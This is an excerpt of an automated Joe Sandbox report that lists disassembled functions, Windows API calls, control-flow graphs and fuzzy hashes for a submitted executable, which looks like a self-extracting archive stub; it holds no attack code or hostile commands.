                                                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00A3ED97
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A3EDB1
                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A3EDC2
                                                                                              • TranslateMessage.USER32(?), ref: 00A3EDCC
                                                                                              • DispatchMessageW.USER32(?), ref: 00A3EDD6
                                                                                              • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00A3EDE1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                              • String ID:
                                                                                              • API String ID: 2148572870-0
                                                                                              • Opcode ID: 35c8a55e587305701f1dc22e522886f5284de74f7e519d46016f32d2b7974062
                                                                                              • Instruction ID: 2da834db4d01f4862841f66befe8ba0bf384901d55d4814c9fab010837a7d527
                                                                                              • Opcode Fuzzy Hash: 35c8a55e587305701f1dc22e522886f5284de74f7e519d46016f32d2b7974062
                                                                                              • Instruction Fuzzy Hash: 17F03C72E01219ABCB20ABE1EC4CDCF7E7CEF45391F108021BA0BD2090D6348556C7E0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3DFCC Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 848 a3dfcc-a3dfcf 849 a3dfd5-a3dffa GetTempPathW call a2caa0 848->849 850 a3e14e-a3e151 848->850 858 a3dffe-a3e02a call a24a20 call a2b4c1 849->858 852 a3e157-a3e15d 850->852 853 a3e51e-a3e549 call a3c504 850->853 855 a3e169-a3e170 852->855 856 a3e15f 852->856 861 a3d8d8-a3d8e6 853->861 862 a3e54f-a3e55d 853->862 855->853 856->855 871 a3dffc-a3dffd 858->871 872 a3e02c-a3e043 SetDlgItemTextW 858->872 863 a3d8e7-a3d8fc call a3c11c 861->863 870 a3d8fe 863->870 874 a3d900-a3d915 call a33316 870->874 871->858 872->853 873 a3e049-a3e04f 872->873 873->853 875 a3e055-a3e070 call a433ac 873->875 880 a3d922-a3d925 874->880 881 a3d917-a3d91b 874->881 882 a3e072-a3e07e 875->882 883 a3e0c0-a3e0c7 875->883 880->853 885 a3d92b 880->885 881->874 884 a3d91d 881->884 882->883 886 a3e080 882->886 887 a3e0f9-a3e129 call a3bea2 call a3b7f4 883->887 888 a3e0c9-a3e0f4 call a3192f * 2 883->888 884->853 889 a3db03-a3db05 885->889 890 a3d932-a3d935 885->890 891 a3dbc1-a3dbc3 885->891 892 a3dba4-a3dba6 885->892 894 a3e083-a3e087 886->894 887->853 929 a3e12f-a3e149 EndDialog 887->929 888->887 889->853 897 a3db0b-a3db17 889->897 890->853 899 a3d93b-a3d995 call a3b65d call a2d200 call a2b93d call a2ba77 call a279e5 890->899 891->853 896 a3dbc9-a3dbd0 891->896 892->853 895 a3dbac-a3dbbc SetWindowTextW 892->895 901 a3e09b-a3e0b8 call a3192f 894->901 902 a3e089-a3e097 894->902 895->853 896->853 903 a3dbd6-a3dbef 896->903 904 a3db2b-a3db30 897->904 905 a3db19-a3db2a call a48a79 897->905 966 a3dad4-a3dae9 call a2b9ca 899->966 901->883 902->894 913 a3e099 902->913 915 a3dbf1 903->915 916 a3dbf7-a3dc05 call a44fa3 903->916 910 a3db32-a3db38 904->910 911 a3db3a-a3db45 call a3c67e 904->911 905->904 919 a3db4a-a3db4c 910->919 911->919 913->883 915->916 916->853 931 a3dc0b-a3dc14 916->931 927 a3db57-a3db77 call a44fa3 call a4521e 919->927 928 a3db4e-a3db55 call a44fa3 919->928 954 a3db90-a3db92 927->954 955 a3db79-a3db80 927->955 928->927 929->853 935 a3dc16-a3dc1a 931->935 936 a3dc3d-a3dc40 931->936 940 a3dc46-a3dc49 935->940 941 a3dc1c-a3dc24 935->941 936->940 943 a3dd25-a3dd33 call a3192f 936->943 948 a3dc56-a3dc71 940->948 949 a3dc4b-a3dc50 940->949 941->853 946 a3dc2a-a3dc38 call a3192f 941->946 956 a3dd35-a3dd49 call a436be 943->956 946->956 967 a3dc73-a3dcad 948->967 968 a3dcbb-a3dcc2 948->968 949->943 949->948 954->853 957 a3db98-a3db9f call a45219 954->957 961 a3db82-a3db84 955->961 962 a3db87-a3db8f call a48a79 955->962 976 a3dd56-a3ddb0 call a3192f call a3c3ae GetDlgItem SetWindowTextW SendMessageW call a47306 956->976 977 a3dd4b-a3dd4f 956->977 957->853 961->962 962->954 983 a3d99a-a3d9ae SetFileAttributesW 966->983 984 a3daef-a3dafe call a2b953 966->984 994 a3dcb1-a3dcb3 967->994 995 a3dcaf 967->995 970 a3dcf0-a3dd13 call a44fa3 * 2 968->970 971 a3dcc4-a3dcdc call a44fa3 968->971 970->956 1005 a3dd15-a3dd23 call a31907 970->1005 971->970 988 a3dcde-a3dceb call a31907 971->988 976->853 1014 a3ddb6-a3ddca SendMessageW 976->1014 977->976 982 a3dd51-a3dd53 977->982 982->976 990 a3da54-a3da64 GetFileAttributesW 983->990 991 a3d9b4-a3d9e7 call a2cdc0 call a2caa0 call a44fa3 983->991 984->853 988->970 990->966 1000 a3da66-a3da75 DeleteFileW 990->1000 1020 a3d9fa-a3da08 call a2d1c1 991->1020 1021 a3d9e9-a3d9f8 call a44fa3 991->1021 994->968 995->994 1000->966 1004 a3da77-a3da7a 1000->1004 1008 a3da7e-a3daaa call a24a20 GetFileAttributesW 1004->1008 1005->956 1018 a3da7c-a3da7d 1008->1018 1019 a3daac-a3dac2 MoveFileW 1008->1019 1014->853 1018->1008 1019->966 1022 a3dac4-a3dace MoveFileExW 1019->1022 1020->984 1027 a3da0e-a3da4e call a44fa3 call a411b0 SHFileOperationW 1020->1027 1021->1020 1021->1027 1022->966 1027->990
                                                                                              APIs
                                                                                              • GetTempPathW.KERNEL32(00000800,?), ref: 00A3DFE2
                                                                                                • Part of subcall function 00A2CAA0: _wcslen.LIBCMT ref: 00A2CAA6
                                                                                              • _swprintf.LIBCMT ref: 00A3E016
                                                                                                • Part of subcall function 00A24A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A24A33
                                                                                              • SetDlgItemTextW.USER32(?,00000066,00A72892), ref: 00A3E036
                                                                                              • EndDialog.USER32(?,00000001), ref: 00A3E143
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                                                              • String ID: %s%s%u
                                                                                              • API String ID: 110358324-1360425832
                                                                                              • Opcode ID: 897b5d76a342555841df8d25dae65f301cb2c89f75ed6dd6946cc9650bda3866
                                                                                              • Instruction ID: 3c1697ebb3b3ed26653023f46546d7dea228e89f70c711654c252f808cc81811
                                                                                              • Opcode Fuzzy Hash: 897b5d76a342555841df8d25dae65f301cb2c89f75ed6dd6946cc9650bda3866
                                                                                              • Instruction Fuzzy Hash: 22416F71940218AADF25DBA0DD45FEA77FCEB04305F4084A6F909A7091EF719A85CF61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3BD1B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34comCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 00A31B3B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00A31B56
                                                                                                • Part of subcall function 00A31B3B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00A3063A,Crypt32.dll,00000000,00A306B4,00000200,?,00A30697,00000000,00000000,?), ref: 00A31B78
                                                                                              • OleInitialize.OLE32(00000000), ref: 00A3BD34
                                                                                              • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00A3BD6B
                                                                                              • SHGetMalloc.SHELL32(00A6A460), ref: 00A3BD75
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                              • String ID: riched20.dll$3To
                                                                                              • API String ID: 3498096277-2168385784
                                                                                              • Opcode ID: efc21cfeef71336d3ef84e6adb48488f3fb9421442d42bc58ccb705e3890494d
                                                                                              • Instruction ID: ff09d5b635d3c58171374934965b0ecb4c862c8286d2444c78ce9e13aaff669c
                                                                                              • Opcode Fuzzy Hash: efc21cfeef71336d3ef84e6adb48488f3fb9421442d42bc58ccb705e3890494d
                                                                                              • Instruction Fuzzy Hash: C8F049B1C00209AFCB10AFA9C8499EFFBFCEF80304F00441AF804A2200DBB456468BA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A2AB40 Relevance: 7.6, APIs: 5, Instructions: 111filetimeCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1036 a2ab40-a2ab61 call a3ffd0 1039 a2ab63-a2ab66 1036->1039 1040 a2ab6c 1036->1040 1039->1040 1041 a2ab68-a2ab6a 1039->1041 1042 a2ab6e-a2ab7f 1040->1042 1041->1042 1043 a2ab81 1042->1043 1044 a2ab87-a2ab91 1042->1044 1043->1044 1045 a2ab93 1044->1045 1046 a2ab96-a2aba3 call a279e5 1044->1046 1045->1046 1049 a2aba5 1046->1049 1050 a2abab-a2abca CreateFileW 1046->1050 1049->1050 1051 a2ac1b-a2ac1f 1050->1051 1052 a2abcc-a2abee GetLastError call a2cf32 1050->1052 1054 a2ac23-a2ac26 1051->1054 1056 a2ac28-a2ac2d 1052->1056 1060 a2abf0-a2ac13 CreateFileW GetLastError 1052->1060 1054->1056 1057 a2ac39-a2ac3e 1054->1057 1056->1057 1061 a2ac2f 1056->1061 1058 a2ac40-a2ac43 1057->1058 1059 a2ac5f-a2ac70 1057->1059 1058->1059 1062 a2ac45-a2ac59 SetFileTime 1058->1062 1063 a2ac72-a2ac8a call a3192f 1059->1063 1064 a2ac8e-a2ac99 1059->1064 1060->1054 1065 a2ac15-a2ac19 1060->1065 1061->1057 1062->1059 1063->1064 1065->1054
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00A28243,?,00000005,?,00000011), ref: 00A2ABBF
                                                                                              • GetLastError.KERNEL32(?,?,00A28243,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00A2ABCC
                                                                                              • CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00A28243,?,00000005,?), ref: 00A2AC02
                                                                                              • GetLastError.KERNEL32(?,?,00A28243,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00A2AC0A
                                                                                              • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00A28243,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00A2AC59
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$CreateErrorLast$Time
                                                                                              • String ID:
                                                                                              • API String ID: 1999340476-0
                                                                                              • Opcode ID: 4befb2b06ad74e390afe428eed88b2446fe418b5dce3e7d35f83267560a3106f
                                                                                              • Instruction ID: 1aab2e0cf91e1bc0f4b03a7f1f9a2bf9893de1bed283e91902cb96e03d65e662
                                                                                              • Opcode Fuzzy Hash: 4befb2b06ad74e390afe428eed88b2446fe418b5dce3e7d35f83267560a3106f
                                                                                              • Instruction Fuzzy Hash: 31318A305447916FE330DF68ED45BDABBE4BB15324F200B29F9A1921D1C3B4A885CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3C758 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1106 a3c758-a3c771 PeekMessageW 1107 a3c773-a3c787 GetMessageW 1106->1107 1108 a3c7ac-a3c7ae 1106->1108 1109 a3c789-a3c796 IsDialogMessageW 1107->1109 1110 a3c798-a3c7a6 TranslateMessage DispatchMessageW 1107->1110 1109->1108 1109->1110 1110->1108
                                                                                              APIs
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A3C769
                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A3C77A
                                                                                              • IsDialogMessageW.USER32(0001046C,?), ref: 00A3C78E
                                                                                              • TranslateMessage.USER32(?), ref: 00A3C79C
                                                                                              • DispatchMessageW.USER32(?), ref: 00A3C7A6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$DialogDispatchPeekTranslate
                                                                                              • String ID:
                                                                                              • API String ID: 1266772231-0
                                                                                              • Opcode ID: da1f786080e6e67e7a7781171461e6e140ed8650395d415584951bee341ad1c8
                                                                                              • Instruction ID: 99f449870df49d5504a18531e7211a873e8b8d9ecb50f645c66aa65739c5fb27
                                                                                              • Opcode Fuzzy Hash: da1f786080e6e67e7a7781171461e6e140ed8650395d415584951bee341ad1c8
                                                                                              • Instruction Fuzzy Hash: AAF0A975D01519AACB20EBF6AC4CDDB7EBCEE05761B404415B906E2150E764D506CBE0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3BBC0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1111 a3bbc0-a3bbdf GetClassNameW 1112 a3bbe1-a3bbf6 call a33316 1111->1112 1113 a3bc07-a3bc09 1111->1113 1118 a3bc06 1112->1118 1119 a3bbf8-a3bc04 FindWindowExW 1112->1119 1114 a3bc14-a3bc16 1113->1114 1115 a3bc0b-a3bc0e SHAutoComplete 1113->1115 1115->1114 1118->1113 1119->1118
                                                                                              APIs
                                                                                              • GetClassNameW.USER32(?,?,00000050), ref: 00A3BBD7
                                                                                              • SHAutoComplete.SHLWAPI(?,00000010), ref: 00A3BC0E
                                                                                                • Part of subcall function 00A33316: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00013316,00A2D523,00000000,.exe,?,?,00000800,?,?,?,00A39E5C), ref: 00A3332C
                                                                                              • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00A3BBFE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                              • String ID: EDIT
                                                                                              • API String ID: 4243998846-3080729518
                                                                                              • Opcode ID: a96ac3a5ca86a1705c203cfb65ac07b5972f14fb413ceb442157b89836214a2e
                                                                                              • Instruction ID: 82c67ffc2b71c98f80d238a0869bd82bdab4bb1cf80fe59b792eb8d764fd7806
                                                                                              • Opcode Fuzzy Hash: a96ac3a5ca86a1705c203cfb65ac07b5972f14fb413ceb442157b89836214a2e
                                                                                              • Instruction Fuzzy Hash: 80F08232E006287BDB30A7B59C09F9F7A6CAB4AB40F440021BE00B6180DB60E90286F6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3ED2E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00A3ED44
                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00A3ED80
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentVariable
                                                                                              • String ID: sfxcmd$sfxpar
                                                                                              • API String ID: 1431749950-3493335439
                                                                                              • Opcode ID: fc6dd97abe2e95ba4c83aa682a3c9603e8e4adcf8a546e5adc4cf22aee7ca246
                                                                                              • Instruction ID: 1c0798e4e7a03b7d85f096b9ce5afc4dcdc1d32bdca33b285ae50a0920c5c265
                                                                                              • Opcode Fuzzy Hash: fc6dd97abe2e95ba4c83aa682a3c9603e8e4adcf8a546e5adc4cf22aee7ca246
                                                                                              • Instruction Fuzzy Hash: B6F06572901724BBDB216FD08C06EBA7B68BF19B82F444651FD8597096E774C880D6B0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A44DA2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,00A44D53,00000000,?,00A840C4,?,?,?,00A44EF6,00000004,InitializeCriticalSectionEx,00A57424,InitializeCriticalSectionEx), ref: 00A44DAF
                                                                                              • GetLastError.KERNEL32(?,00A44D53,00000000,?,00A840C4,?,?,?,00A44EF6,00000004,InitializeCriticalSectionEx,00A57424,InitializeCriticalSectionEx,00000000,?,00A44CAD), ref: 00A44DB9
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00A44DE1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                              • String ID: api-ms-
                                                                                              • API String ID: 3177248105-2084034818
                                                                                              • Opcode ID: 37e6b3b4fbc90b98e3a4c2f5a5e4f6f43ce39622b25871711dc790a0f1494ad0
                                                                                              • Instruction ID: ba307249ac9625a64a5ccf45b376cf8b3a7eccc2bc46ea20c7764f85d1ed5b7b
                                                                                              • Opcode Fuzzy Hash: 37e6b3b4fbc90b98e3a4c2f5a5e4f6f43ce39622b25871711dc790a0f1494ad0
                                                                                              • Instruction Fuzzy Hash: DAE04F3C684304B7EF105BA1EC06FAD3F58BF44B66F200020FA0DA84E1E761A9919584
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A2A9E5 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00A2A9F5
                                                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00A2AA0D
                                                                                              • GetLastError.KERNEL32 ref: 00A2AA3F
                                                                                              • GetLastError.KERNEL32 ref: 00A2AA5E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$FileHandleRead
                                                                                              • String ID:
                                                                                              • API String ID: 2244327787-0
                                                                                              • Opcode ID: 5b78485ecc3b8ff70ed397d254fd2b9377d8565538c5f710bf242cb59dab2573
                                                                                              • Instruction ID: d8ae3fd991836940d46f90e770e6f0cecd71b10ae4c08fbd67da6a83ec1c5a55
                                                                                              • Opcode Fuzzy Hash: 5b78485ecc3b8ff70ed397d254fd2b9377d8565538c5f710bf242cb59dab2573
                                                                                              • Instruction Fuzzy Hash: 7B118231900224EBCF209FA8FE0466E37B9BF253A5F204636F91A86190D7748E85DB53
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A4BEF4 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00A45281,00000000,00000000,?,00A4BE9B,00A45281,00000000,00000000,00000000,?,00A4C098,00000006,FlsSetValue), ref: 00A4BF26
                                                                                              • GetLastError.KERNEL32(?,00A4BE9B,00A45281,00000000,00000000,00000000,?,00A4C098,00000006,FlsSetValue,00A58A00,FlsSetValue,00000000,00000364,?,00A4A5E7), ref: 00A4BF32
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00A4BE9B,00A45281,00000000,00000000,00000000,?,00A4C098,00000006,FlsSetValue,00A58A00,FlsSetValue,00000000), ref: 00A4BF40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 3177248105-0
